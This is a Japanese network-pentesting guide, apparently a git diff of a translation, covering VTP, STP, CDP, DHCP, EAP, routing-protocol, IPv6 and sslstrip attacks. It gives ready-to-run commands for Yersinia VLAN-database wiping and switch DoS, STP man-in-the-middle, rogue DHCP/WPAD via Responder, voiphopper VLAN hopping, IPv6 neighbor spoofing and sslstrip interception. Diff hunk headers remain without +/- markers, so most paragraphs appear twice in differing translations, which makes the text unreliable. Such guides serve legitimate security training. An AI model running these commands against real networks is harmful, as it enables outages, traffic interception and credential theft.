- **サマリ広告:** 重要なドメイン情報を含むVTPサーバーによって300秒ごとにブロードキャストされます。
- **サブセット広告:** VLAN構成の変更後に送信されます。
- **広告リクエスト:** VTPクライアントがサマリ広告をリクエストするために発行され、通常はより高い構成リビジョン番号を検出した場合に応答します。
VTPは**トランクポートからのみ攻撃**できます。**VTPアナウンスはトランクポートでのみブロードキャストおよび受信されるためです。** **そのため、DTPを攻撃した後のペンテストでは、次のターゲットはVTPになる可能性があります。** VTPドメインを攻撃するには、**Yersinia**を使用して**VTPインジェクトを実行**し、**VLANデータベース全体を消去**してネットワークを麻痺させることができます。
VTPの脆弱性はトランクポートを介してのみ悪用可能であり、VTPアナウンスはこれらのポートを通じてのみ循環します。DTP攻撃シナリオの後、VTPに向けられる可能性があります。YersiniaなどのツールはVTP攻撃を容易にし、VLANデータベースを消去し、ネットワークを効果的に混乱させることを目指します。
{% hint style="info" %}
VTPプロトコルには**3つのバージョン**があります。この投稿では、最初のバージョンであるVTPv1に対する攻撃が行われています。
{% endhint %}
注意: この議論はVTPバージョン1VTPv1に関連しています。
```bash
yersinia -G #For graphic mode
%% yersinia -G # Launch Yersinia in graphical mode ```
```
VLANデータベース全体を消去するには、**すべてのVTP VLANを削除**オプションを選択します
<figure><img src="../../.gitbook/assets/image (22) (2).png" alt=""><figcaption></figcaption></figure>
### STP攻撃
**インターフェースでBPDUフレームをキャプチャできない場合、STP攻撃が成功する可能性は低いです。**
**インターフェースでBPDUフレームをキャプチャできない場合、STP攻撃を成功させる可能性は低いです。**
#### **STP BPDU DoS**
@ -405,63 +409,76 @@ yersinia stp -attack 3
```
#### **STP TCP Attack**
TCPを送信すると、スイッチのCAMテーブルが15秒で削除されます。その後、この種のパケットを連続して送信していると、CAMテーブルが連続して再起動されますまたは15秒ごとにし、再起動されると、スイッチはハブのように振る舞います。
TCPを送信すると、スイッチのCAMテーブルが15秒で削除されます。その後、この種のパケットを連続して送信していると、CAMテーブルが連続して再起動されますまたは15秒ごとにし、再起動されると、スイッチはハブのように動作します。
```bash
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```
#### **STP Root Attack**
攻撃者は、スイッチの振る舞いをシミュレートしてネットワークのSTPルートとなります。その後、より多くのデータが攻撃者を経由して通過します。これは、2つの異なるスイッチに接続されている場合に興味深いです。\
攻撃者は、スイッチの振る舞いをシミュレートしてネットワークのSTPルートになります。その後、より多くのデータが彼を通過します。これは、2つの異なるスイッチに接続されている場合に興味深いです。\
これは、**優先度**値が実際のルートスイッチの優先度よりも低いということを示すBPDUs CONFパケットを送信することで行われます。
```bash
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
```
**攻撃者が2つのスイッチに接続されている場合、彼は新しいツリーのルートとなり、それらのスイッチ間のすべてのトラフィックが彼を経由することになります**MITM攻撃が実行されます
**攻撃者が2つのスイッチに接続されている場合、彼は新しいツリーのルートとなり、それらのスイッチ間のすべてのトラフィックが彼を経由するようになります**MITM攻撃が実行されます
```bash
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
```
### CDP攻撃
CISCO Discovery Protocolは、CISCOデバイスが相互に通信し、**誰が生きているか**、どのような機能を持っているかを**発見**するために使用されるプロトコルです。
CISCO Discovery ProtocolCDPは、CISCOデバイス間の通信に不可欠であり、**お互いを識別し構成の詳細を共有**することができます。
#### 情報収集 <a href="#0e0f" id="0e0f"></a>
#### パッシブデータ収集 <a href="#0e0f" id="0e0f"></a>
**デフォルトでは、CDPはすべてのポートにアナウンスを送信します。** しかし、侵入者が同じスイッチのポートに接続した場合はどうなるでしょうか? **Wireshark**、**tcpdump**、または**Yersinia**などのネットワークスニッファを使用して、彼は**デバイス自体に関する貴重な情報**を抽出できます。その情報を使用して、彼は同じバージョンのCisco IOSを列挙し、脆弱性を見つけてそれを悪用することができます
CDPはすべてのポートを介して情報をブロードキャストするように構成されており、これはセキュリティリスクにつながる可能性があります。攻撃者は、スイッチポートに接続した際に、**Wireshark**、**tcpdump**、または**Yersinia**などのネットワークスニッファを展開することができます。この行動により、ネットワークデバイスに関する機密データが公開され、そのモデルや実行されているCisco IOSのバージョンなどが明らかになります。攻撃者は、特定の脆弱性を特定されたCisco IOSバージョンに対して標的にするかもしれません
#### CDPフラッディング攻撃 <a href="#0d6a" id="0d6a"></a>
#### CDPテーブルフラッディングの誘発 <a href="#0d6a" id="0d6a"></a>
実際のCISCOデバイスをシミュレートしてデバイスメモリを枯渇させることで、CISCOスイッチにDoS攻撃を行うことができます。
より攻撃的なアプローチは、合法的なCISCOデバイスであるかのように振る舞い、スイッチのメモリを圧倒してサービスの拒否DoS攻撃を実行することです。以下は、テスト用に設計されたネットワークツールであるYersiniaを使用してこのような攻撃を開始するためのコマンドシーケンスです
```bash
sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
# Or you could use the GUI
sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G
```
**フラッディングCDPテーブル**オプションを選択して攻撃を開始します。スイッチのCPUおよびCDP隣接テーブルが過負荷となり、「ネットワークの麻痺」が発生します。
<figure><img src="../../.gitbook/assets/image (1) (5) (1).png" alt=""><figcaption></figcaption></figure>
攻撃中、スイッチのCPUとCDP隣接テーブルが重く負荷され、しばしば**「ネットワーク麻痺」**と呼ばれる状態に至る。
#### CDPなりすまし攻撃
```bash
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
```
### VoIP 攻撃
[**scapy**](https://github.com/secdev/scapy/)も使用できます。`scapy/contrib`パッケージをインストールしてください。
従業員のインターネットプロトコルVoIP電話で使用することを意図していましたが、現代のVoIPデバイスは、ますますIoTデバイスと統合されるようになっています。多くの従業員は、特別な電話番号を使用してドアを開けたり、部屋の温度調節を制御したりできるようになりました...
### VoIP攻撃とVoIP Hopperツール
ツール[**voiphopper**](http://voiphopper.sourceforge.net) は、Cisco、Avaya、Nortel、Alcatel-Lucent環境のVoIP電話の振る舞いを模倣します。サポートするデバイス検出プロトコルの1つを使用して、音声ネットワークの正しいVLAN IDを自動的に検出します。サポートするプロトコルには、Cisco Discovery ProtocolCDP、Dynamic Host Configuration ProtocolDHCP、Link Layer Discovery Protocol Media Endpoint DiscoveryLLDP-MED、および802.1Q ARPがあります。
IoTデバイスと統合されることが増えているVoIP電話は、特別な電話番号を介してドアの解除や温度調節器の制御などの機能を提供します。ただし、この統合はセキュリティリスクを引き起こす可能性があります。
**VoIP Hopper** は **3つ** のCDPモードをサポートしています。**sniff** モードはネットワークパケットを検査し、VLAN IDを特定しようとします。これを使用するには、**`-c`** パラメータを `0` に設定します。**spoof** モードは、企業ネットワークで実際のVoIPデバイスが送信するのと同様のカスタムパケットを生成します。これを使用するには、**`-c`** パラメータを **`1`** に設定します。**pre-madepacket** とスプーフィングするモードは、Cisco 7971G-GE IP電話と同じパケットを送信します。これを使用するには、**`-c`** パラメータを **`2`** に設定します。
ツール[**voiphopper**](http://voiphopper.sourceforge.net)は、さまざまな環境Cisco、Avaya、Nortel、Alcatel-LucentでVoIP電話をエミュレートするよう設計されています。CDP、DHCP、LLDP-MED、802.1Q ARPなどのプロトコルを使用して、音声ネットワークのVLAN IDを発見します。
最後の方法を使用しています。**`-i`** パラメータは攻撃者の **ネットワークインターフェース** を指定し、**`-E`** パラメータは模倣される **VOIPデバイスの名前** を指定します。私たちは、CiscoのVoIP電話の命名形式と互換性のあるSEP001EEEEEEEEEという名前を選びました。この形式は、「SEP」とMACアドレスに続く単語で構成されています。企業環境では、電話の背面にあるMACラベルを見て既存のVoIPデバイスを模倣することができます。電話のディスプレイ画面で設定ボタンを押してモデル情報オプションを選択するか、VoIPデバイスのイーサネットケーブルをートパソコンに接続し、Wiresharkを使用してデバイスのCDPリクエストを観察することができます。
**VoIP Hopper**には、Cisco Discovery ProtocolCDPに対して3つのモードがあります
1. **スニッフモード**`-c 0`ネットワークパケットを分析してVLAN IDを特定します。
2. **スプーフモード**`-c 1`実際のVoIPデバイスのパケットを模倣するカスタムパケットを生成します。
3. **事前作成パケットモードでスプーフ**`-c 2`特定のCisco IP電話モデルと同一のパケットを送信します。
速度を重視する場合、3番目のモードが好ましいです。指定する必要があるものは次のとおりです
- 攻撃者のネットワークインターフェース(`-i`パラメータ)。
- エミュレートされるVoIPデバイスの名前`-E`パラメータ、Ciscoの命名形式に従う必要がありますMACアドレスに続くSEP
企業環境では、既存のVoIPデバイスを模倣するために、次のような手順を踏むことがあります
- 電話機のMACラベルを調査する。
- モデル情報を表示するために電話機のディスプレイ設定をナビゲートする。
- VoIPデバイスをートパソコンに接続し、Wiresharkを使用してCDPリクエストを観察する。
3番目のモードでツールを実行するための例示コマンドは次のとおりです
```bash
voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
```
もしツールが正常に実行されると、**VLANネットワークは攻撃者のデバイスにIPv4アドレスを割り当てます**。
### DHCP攻撃
#### 列挙
@ -484,54 +501,59 @@ Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
```
**DoS**
DHCPサーバーに対しては、**2種類のDoS**が実行される可能性があります。最初の方法は、**十分な偽のホストをシミュレートして、すべての可能なIPアドレスを使用する**ことです。\
この攻撃は、DHCPサーバーの応答を見ることができ、プロトコルを完了できる場合にのみ機能します**Discover**(コンピュータ)--> **Offer**(サーバー)--> **Request**(コンピュータ)--> **ACK**(サーバー))。たとえば、これは**Wifiネットワークでは不可能**です。
DHCPサーバーに対して実行できる**DoS**には2種類があります。最初の方法は、**十分な偽のホストをシミュレートして、可能なすべてのIPアドレスを使用する**ことです。\
この攻撃は、DHCPサーバーの応答を見ることができ、プロトコルを完了できる場合にのみ機能します**Discover**(コンピュータ--> **Offer**(サーバー)--> **Request**(コンピュータ--> **ACK**(サーバー))。たとえば、これは**Wifiネットワークでは不可能**です。
DHCP DoSを実行する別の方法は、**すべての可能なIPを送信元コードとして使用してDHCP-RELEASEパケットを送信する**ことです。その後、サーバーは誰もがIPを使用し終わったと思うでしょう。
DHCP DoSを実行する別の方法は、**すべての可能なIPをソースコードとして使用してDHCP-RELEASEパケットを送信**することです。その後、サーバーは誰もがIPを使用し終わったと思うでしょう。
```bash
yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed
```
より自動的な方法は、[DHCPing](https://github.com/kamorin/DHCPig)ツールを使用することです。
環境内のクライアントに新しいリースを取得させるために、上記のDoS攻撃を使用して、合法的なサーバーを使い果たし、応答がなくなるようにします。したがって、合法的なサーバーが再接続しようとすると、**次の攻撃で言及されている悪意のある値を提供できます**。
環境内のクライアントに新しいリースを取得させるために、上記のDoS攻撃を使用して、合法的なサーバーを使い果たし、応答しなくなるようにすることができます。したがって、合法的なサーバーが再接続しようとすると、**次の攻撃で言及されている悪意のある値を提供できます**。
#### 悪意のある値を設定する
Rogue DHCPサーバーを確立するためにResponder DHCPスクリプト_/usr/share/responder/DHCP.py_を使用できます。悪意のあるゲートウェイを設定するのは理想的ではありません。なぜなら、乗っ取られた接続は半二重であるためつまり、クライアントからの出力パケットをキャプチャしますが、合法的なゲートウェイからの応答はキャプチャしません、特にHTTPトラフィックと資格情報をキャプチャするために、ローグDNSまたはWPADサーバーを設定することをお勧めします。
`/usr/share/responder/DHCP.py`にあるDHCPスクリプトを使用して、ローグDHCPサーバーを設定できます。これは、HTTPトラフィックや資格情報をキャプチャするなどのネットワーク攻撃に役立ちます。ただし、ローグゲートウェイを設定するのは効果が低いため、クライアントからのアウトバウンドトラフィックのみをキャプチャでき、実際のゲートウェイからの応答を見逃します。代わりに、ローグDNSサーバーやWPADサーバーを設定することをお勧めします。
| 説明 | 例 |
| ------------------------------------------- | ---------------------------------------------------------------------------- |
| ゲートウェイとして広告される私たちのIPアドレス | _-i 10.0.0.100_ |
| ローカルDNSドメイン名オプション | _-d example.org_ |
| 元のルーター/ゲートウェイのIPアドレス | _-r 10.0.0.1_ |
| プライマリDNSサーバーのIPアドレス | _-p 10.0.0.100_ |
| セカンダリDNSサーバーのIPアドレスオプション | _-s 10.0.0.1_ |
| ローカルネットワークのネットマスク | _-n 255.255.255.0_ |
| DHCPトラフィックを受信するためのインターフェース | _-I eth1_ |
| WPAD構成アドレスURL | _-w “[http://10.0.0.100/wpad.dat\n”](http://10.0.0.100/wpad.dat/n%E2%80%9D) |
| デフォルトゲートウェイIPアドレスをスプーフィング | -S |
| すべてのDHCPリクエストに応答する非常にイジー | -R |
以下は、ローグDHCPサーバーを構成するためのコマンドオプションです
- **当社のIPアドレスゲートウェイ広告**`-i 10.0.0.100`を使用して、自分のマシンのIPをゲートウェイとして広告します。
- **ローカルDNSドメイン名**:オプションで、`-d example.org`を使用してローカルDNSドメイン名を設定します。
- **元のルーター/ゲートウェイIP**合法的なルーターやゲートウェイのIPアドレスを指定するには、`-r 10.0.0.1`を使用します。
- **プライマリDNSサーバーIP**コントロールするローグDNSサーバーのIPアドレスを設定するには、`-p 10.0.0.100`を使用します。
- **セカンダリDNSサーバーIP**オプションで、セカンダリDNSサーバーIPを設定するには、`-s 10.0.0.1`を使用します。
- **ローカルネットワークのネットマスク**:ローカルネットワークのネットマスクを定義するには、`-n 255.255.255.0`を使用します。
- **DHCPトラフィック用のインターフェース**特定のネットワークインターフェースでDHCPトラフィックをリッスンするには、`-I eth1`を使用します。
- **WPAD構成アドレス**Webトラフィックの傍受を支援するために、`-w “http://10.0.0.100/wpad.dat”`を使用してWPAD構成のアドレスを設定します。
- **デフォルトゲートウェイIPのスプーフィング**デフォルトゲートウェイIPアドレスをスプーフィングするには、`-S`を含めます。
- **すべてのDHCPリクエストに応答する**サーバーがすべてのDHCPリクエストに応答するようにするには、`-R`を含めますが、これはノイズが多く、検出される可能性があることに注意してください。
これらのオプションを正しく使用することで、ローグDHCPサーバーを効果的に設定してネットワークトラフィックを傍受できます。
```python
# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R
```
### **EAP攻撃**
802.1X実装に対して使用できる攻撃戦術のいくつかは次のとおりです:
以下は、802.1X実装に対して使用できる攻撃戦術のいくつかです:
* EAPを介したアクティブな総当たりパスワード攻撃
* 異常なEAPコンテンツを使用してRADIUSサーバーを攻撃する _\*\*_(exploits)
* EAPを介したアクティブな総当たりパスワードクラッキング
* 不正なEAPコンテンツによるRADIUSサーバーへの攻撃 _(exploits)_
* EAPメッセージのキャプチャとオフラインパスワードクラッキングEAP-MD5およびPEAP
* EAP-MD5認証を強制してTLS証明書の検証をバイパスする
* ハブまたは類似のものを使用して認証後に悪意のあるネットワークトラフィックを注入する
攻撃者が被害者と認証サーバーの間にいる場合、必要に応じて認証プロトコルをEAP-MD5に劣化させ、認証試行をキャプチャしようとするかもしれません。その後、これを総当たり攻撃してください
攻撃者が被害者と認証サーバーの間にいる場合、認証プロトコルをEAP-MD5に劣化させ、認証試行をキャプチャしようとすることができます。その後、以下を使用して総当たり攻撃を行うことができます
```
eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt
```
### FHRPGLBPHSRP攻撃 <a href="#6196" id="6196"></a>
### FHRP (GLBP & HSRP) 攻撃 <a href="#6196" id="6196"></a>
**FHRP**First Hop Redundancy Protocolは、**ホット冗長ルーティングシステムを作成**するために設計されたネットワークプロトコルのクラスです。FHRPを使用すると、物理ルーターを1つの論理デバイスに組み合わせることができ、信頼性を向上させ負荷を分散するのに役立ちます。
**Cisco Systemsのエンジニアは、GLBPとHSRPの2つのFHRPプロトコルを開発しました。**
**シスコシステムのエンジニアは、GLBPとHSRPの2つのFHRPプロトコルを開発しました。**
{% content-ref url="glbp-and-hsrp-attacks.md" %}
[glbp-and-hsrp-attacks.md](glbp-and-hsrp-attacks.md)
@ -539,38 +561,43 @@ eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt
### RIP
ルーティング情報プロトコルRIPには、RIP、RIPv2、RIPngの3つのバージョンが存在します。RIPとRIPv2は、ポート520を介してピアに送信されるUDPデータグラムを使用し、一方、RIPngはIPv6マルチキャストを介してUDPポート521にデータグラムをブロードキャストします。RIPv2はMD5認証サポートを導入しました。RIPngにはネイティブ認証が組み込まれておらず、代わりにIPv6内のオプションのIPsec AHおよびESPヘッダーに依存しています。
ルーティング情報プロトコルRIPには、RIP、RIPv2、RIPngの3つのバージョンが存在します。RIPとRIPv2では、データグラムはUDPを使用してポート520に向かってピアに送信されますが、RIPngではデータグラムはIPv6マルチキャストを介してUDPポート521にブロードキャストされます。 RIPv2ではMD5認証がサポートされています。一方、RIPngにはネイティブ認証が組み込まれておらず、代わりにIPv6内のオプションのIPsec AHおよびESPヘッダーに依存しています。
このプロトコルを攻撃する方法の詳細については、書籍_**「Network Security Assessment: Know Your Network第3版」**_を参照してください。
- **RIPとRIPv2:** 通信はポート520上のUDPデータグラムを介して行われます。
- **RIPng:** IPv6マルチキャストを介してUDPポート521を利用してデータグラムをブロードキャストします。
### EIGRP攻撃
RIPv2はMD5認証をサポートしていますが、RIPngにはネイティブ認証が含まれず、IPv6内のIPsec AHおよびESPヘッダーに依存しています。
**EIGRPEnhanced Interior Gateway Routing Protocol**は、動的ルーティングプロトコルです。**距離ベクトルプロトコル**です。**認証がない**場合やパッシブインターフェースの構成がない場合、**侵入者**はEIGRPルーティングに干渉し、**ルーティングテーブルの毒化**を引き起こす可能性があります。さらに、EIGRPネットワークつまり、自律システム**はフラットで、ゾーンに分割されていません**。**攻撃者がルートを注入**すると、このルートが自律EIGRPシステム全体に**広がる**可能性があります。
### EIGRP 攻撃
EIGRPシステムを攻撃するには、**正当なEIGRPルーターとの隣接関係を確立**する必要があり、これにより基本的な偵察からさまざまなインジェクションまでさまざまな可能性が開かれます。
**EIGRPEnhanced Interior Gateway Routing Protocol**は動的ルーティングプロトコルです。**認証がない**場合やパッシブインターフェイスの構成がない場合、**侵入者**はEIGRPルーティングに干渉し、**ルーティングテーブルの毒化**を引き起こす可能性があります。さらに、EIGRPネットワークつまり、自律システム**はフラットで、ゾーンに分割されていません**。**攻撃者がルートを注入**すると、このルートが自律EIGRPシステム全体に**広がる**可能性があります。
\*\*\*\*[**FRRouting**](https://frrouting.org/)を使用すると、**BGP、OSPF、EIGRP、RIPなどのプロトコルをサポートする仮想ルーター**を実装できます。必要なのは、それを攻撃者のシステムに展開するだけで、実際にはルーティングドメイン内の正当なルーターであるかのように振る舞うことができます。
EIGRPシステムを攻撃するには、**正当なEIGRPルーターとの隣接関係を確立**する必要があります。これにより、基本的な偵察からさまざまなインジェクションまでさまざまな可能性が開かれます。
[**FRRouting**](https://frrouting.org/)を使用すると、**BGP、OSPF、EIGRP、RIPなどのプロトコルをサポートする仮想ルーター**を実装できます。攻撃者のシステムに展開するだけで、ルーティングドメイン内の正当なルーターを装うことができます。
{% content-ref url="eigrp-attacks.md" %}
[eigrp-attacks.md](eigrp-attacks.md)
{% endcontent-ref %}
\*\*\*\*[**Coly**](https://code.google.com/p/coly/)もEIGRPブロードキャストのキャプチャとルーティング構成を操作するためのパケットのインジェクションをサポートしています。Colyを使用して攻撃する方法の詳細については、_**「Network Security Assessment: Know Your Network第3版」**_を参照してください
[**Coly**](https://code.google.com/p/coly/)は、EIGRPEnhanced Interior Gateway Routing Protocolのブロードキャストを傍受する機能を持っています。また、ルーティング構成を変更するために使用できるパケットのインジェクションも可能です
### OSPF
ほとんどのOpen Shortest Path FirstOSPF実装では、ルーター間の認証を提供するためにMD5を使用しています。LokiとJohn the Ripperは、MD5ハッシュをキャプチャして攻撃し、キーを明らかにし、新しいルートを広告するために使用できます。ルートパラメータは、_Injection_タブを使用して設定し、キーは_Connection_の下で設定されます。
Open Shortest Path FirstOSPFプロトコルでは、**MD5認証が一般的に使用され、ルーター間の安全な通信を確保**します。ただし、このセキュリティ対策はLokiやJohn the Ripperなどのツールを使用して妨害される可能性があります。これらのツールはMD5ハッシュをキャプチャしてクラックし、認証キーを公開します。このキーを取得すると、新しいルーティング情報を導入するために使用できます。ルートパラメータを構成し、侵害されたキーを確立するには、それぞれ _Injection_ および _Connection_ タブが使用されます。
このプロトコルを攻撃する方法の詳細については、書籍_**「Network Security Assessment: Know Your Network第3版」**_を参照してください。
- **MD5ハッシュのキャプチャとクラック:** LokiやJohn the Ripperなどのツールが使用されます。
- **ルートパラメータの構成:** _Injection_ タブを介して行われます。
- **侵害されたキーの設定:** キーは _Connection_ タブの下で構成されます。
### その他の一般的なツールとソース
* [**Above**](https://github.com/c4s73r/Above): ネットワークトラフィックをスキャンして脆弱性を見つけるツール
* ネットワーク攻撃に関する詳細は[こちら](https://github.com/Sab0tag3d/MITM-cheatsheet)を参照してください。 _(TODO: すべてを読んで、新しい攻撃があればすべてを読んでください)_
* [**Above**](https://github.com/c4s73r/Above): ネットワークトラフィックをスキャンして脆弱性を見つけるためのツール
* ネットワーク攻撃に関する詳細な情報は[こちら](https://github.com/Sab0tag3d/MITM-cheatsheet)で入手できます。
## **スプーフィング**
攻撃者は、偽のDHCP応答を送信してネットワークの新しいメンバーのすべてのネットワークパラメータGW、IP、DNSを構成します。
攻撃者は、偽のDHCP応答を送信してネットワークの新しいメンバーのすべてのネットワークパラメータGW、IP、DNSを構成します。
```bash
Ettercap
yersinia dhcp -attack 2 #More parameters are needed
@ -600,7 +627,7 @@ dig @localhost domain.example.com # Test the configured DNS
```
### ローカルゲートウェイ
システムやネットワークへの複数の経路が存在することがよくあります。ローカルネットワーク内のMACアドレスのリストを作成した後、_gateway-finder.py_ を使用してIPv4フォワーディングをサポートするホストを特定します。
システムやネットワークへの複数のルートがしばしば存在します。ローカルネットワーク内のMACアドレスのリストを作成した後、_gateway-finder.py_ を使用してIPv4フォワーディングをサポートするホストを特定します。
```
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
@ -620,37 +647,35 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
```
### [LLMNR、NBT-NS、およびmDNSのスプーフィング](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Microsoftシステムでは、DNSルックアップが失敗した場合に、リンクローカルマルチキャスト名解決LLMNRとNetBIOS名前サービスNBT-NSを使用して、ローカルホストの解決を行います。Apple BonjourおよびLinuxゼロ構成実装では、マルチキャストDNSmDNSを使用してネットワーク内のシステムを検出します。これらのプロトコルは認証されず、UDP経由でメッセージをブロードキャストするため、攻撃者はこれらを悪用してユーザーを悪意のあるサービスに誘導することができます。
DNSのルックアップが失敗した場合、Microsoftシステムは**リンクローカルマルチキャストネームリゾルブLLMNR**と**NetBIOSネームサービスNBT-NS**に依存しています。同様に、**Apple Bonjour**および**Linuxゼロ構成**の実装は、ネットワーク内のシステムを発見するために**マルチキャストDNSmDNS**を利用しています。これらのプロトコルは認証されていないため、UDPを介してメッセージをブロードキャストするため、攻撃者によって悪意のあるサービスにユーザーをリダイレクトするために悪用される可能性があります。
Responderを使用して、ホストが検索するサービスを偽の応答を送信することで、サービスを偽装することができます。\
[Responderを使用したサービスの偽装方法](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)に関する詳細情報はこちらを参照してください。
[Responderを使用したサービスの偽装に関する詳細情報はこちら](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)を参照してください。
### [WPADのスプーフィング](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
多くのブラウザは、ネットワークからプロキシ設定を読み込むためにWeb Proxy Auto-DiscoveryWPADを使用します。WPADサーバーは、次のいずれかを通じて識別されると、特定のURLたとえば、[http://wpad.example.org/wpad.dat](http://wpad.example.org/wpad.dat))を介してクライアントプロキシ設定を提供します。
ブラウザは一般的に**Web Proxy Auto-DiscoveryWPADプロトコルを使用してプロキシ設定を自動的に取得**します。これには、特定のURLたとえば "http://wpad.example.org/wpad.dat")を介してサーバーから構成詳細を取得することが含まれます。クライアントによるこのサーバーの発見は、さまざまなメカニズムを介して行われます。
* DHCP、コード252エントリを使用[34](https://learning.oreilly.com/library/view/Network+Security+Assessment,+3rd+Edition/9781491911044/ch05.html#ch05fn41)
* ローカルドメインで_wpad_ホスト名を検索するDNS
* Microsoft LLMNRおよびNBT-NSDNS検索が失敗した場合
- **DHCP**を介して、特別なコード252エントリを利用して発見を促進します。
- **DNS**を介して、ローカルドメイン内の _wpad_ というホスト名を検索します。
- **Microsoft LLMNRおよびNBT-NS**を介して、DNSルックアップが成功しない場合に使用されるフォールバックメカニズムです。
ResponderはWPAD攻撃を自動化し、DHCP、DNS、LLMNR、およびNBT-NSを介してクライアントを悪意のあるWPADサーバーに誘導するプロキシを実行します。\
[Responderを使用したサービスの偽装方法](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)に関する詳細情報はこちらを参照してください。
ツールResponderは、**悪意のあるWPADサーバー**としてこのプロトコルを利用します。それはDHCP、DNS、LLMNR、およびNBT-NSを使用してクライアントを誤誘導します。Responderを使用してサービスを偽装する方法について詳しく知りたい場合は、[こちらをチェックしてください](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)。
### [SSDPおよびUPnPデバイスのスプーフィング](spoofing-ssdp-and-upnp-devices.md)
ネットワーク内で異なるサービスを提供して、ユーザーを騙して平文の資格情報を入力させることができます。\
この攻撃に関する詳細情報は[SSDPおよびUPnPデバイスのスプーフィング](spoofing-ssdp-and-upnp-devices.md)にあります。
ネットワーク内で異なるサービスを提供して、ユーザーをだますことができます。**この攻撃に関する詳細情報は**[**SSDPおよびUPnPデバイスのスプーフィング**](spoofing-ssdp-and-upnp-devices.md)**にあります。**
### IPv6ネイバースプーフィング
この攻撃はARPスプーフィングに非常に似ていますが、IPv6の世界で行われます。被害者がIPv6のGWのMACアドレスが攻撃者のものであると思わせることができます。
この攻撃はARPスプーフィングに非常に似ていますが、IPv6の世界で行われます。被害者に、GWのIPv6が攻撃者のMACアドレスであると思わせることができます。
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
```
### IPv6ルーター広告のスプーフィング/フラッディング
一部のOSは、ネットワーク内で送信されたRAパケットからデフォルトでゲートウェイを構成します。攻撃者をIPv6ルーターとして宣言するためには、次のコマンドを使用できます:
一部のOSは、ネットワーク内で送信されたRAパケットからゲートウェイをデフォルトで構成します。攻撃者をIPv6ルーターとして宣言するために使用できる方法:
```bash
sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
@ -671,7 +696,7 @@ mitm6
### sslStrip
この攻撃が行うことは、**ユーザー**が**HTTP**ページに**アクセス**しようとする場合、そのページが**HTTPS**バージョンに**リダイレクト**されている場合に、**sslStrip**が**クライアントと**の間で**HTTP接続を維持**し、**サーバーと**の間で**HTTPS接続を確立**することです。これにより、接続を**平文**で**嗅ぎ取る**ことができます。
この攻撃が行うことは、**ユーザー**が**HTTP**ページに**アクセス**しようとする場合、そのページが**HTTPS**バージョンに**リダイレクト**される場合に、**sslStrip**は**クライアントと**の間で**HTTP接続を維持**し、**サーバーと**の間で**HTTPS接続を確立**するため、接続を**平文**で**嗅ぎ取る**ことができます。
```bash
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
@ -684,19 +709,19 @@ iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
### HSTSをバイパスするためのsslStrip+およびdns2proxy
**sslStrip+とdns2proxy**と**sslStrip**の**違い**は、例えば_**www.facebook.com**_を_**wwww.facebook.com**_**w**が**追加**された)に**リダイレクト**し、このドメインの**アドレスを攻撃者IPに設定**することです。これにより、**クライアント**は_**wwww.facebook.com**_攻撃者に**接続**しますが、裏では**sslstrip+**が**https**を介して**www.facebook.com**と**実際の接続**を**維持**します。
**sslStrip**と**sslStrip+およびdns2proxy**の**違い**は、例えば_**www.facebook.com**_を_**wwww.facebook.com**_に**リダイレクト**し、このドメインの**アドレスを攻撃者IPに設定**するです。これにより、**クライアント**は_**wwww.facebook.com**_攻撃者に**接続**しますが、裏では**sslstrip+**が**https**を介して**実際の接続**を**www.facebook.com**に維持します。
この技術の**目的**は、_**wwww**.facebook.com_がブラウザの**キャッシュ**に保存されないため、ブラウザが**HTTPでfacebook認証を実行**するように騙すことです。\
この攻撃を実行するには、被害者が最初に[http://www.faceook.com](http://www.faceook.com)にアクセスしようとする必要があり、httpsではないことに注意してください。これは、httpページ内のリンクを変更することで行うことができます。
詳細は[こちら](https://www.bettercap.org/legacy/#hsts-bypass)、[こちら](https://www.slideshare.net/Fatuo\_\_/offensive-exploiting-dns-servers-changes-blackhat-asia-2014)、および[こちら](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly)。
**sslStripまたはsslStrip+はもはや機能しません。これは、ブラウザに事前保存されたHSTSルールがあるためです。したがって、ユーザーが"重要な"ドメインに初めてアクセスする場合でも、HTTPSでアクセスします。また、事前保存されたルールと他の生成されたルールには、**`includeSubdomains`**フラグを使用できることに注意してください。そのため、以前の_**wwww.facebook.com**_の例は機能しなくなります。_**facebook.com**_は`includeSubdomains`を使用してHSTSを使用しているためです。
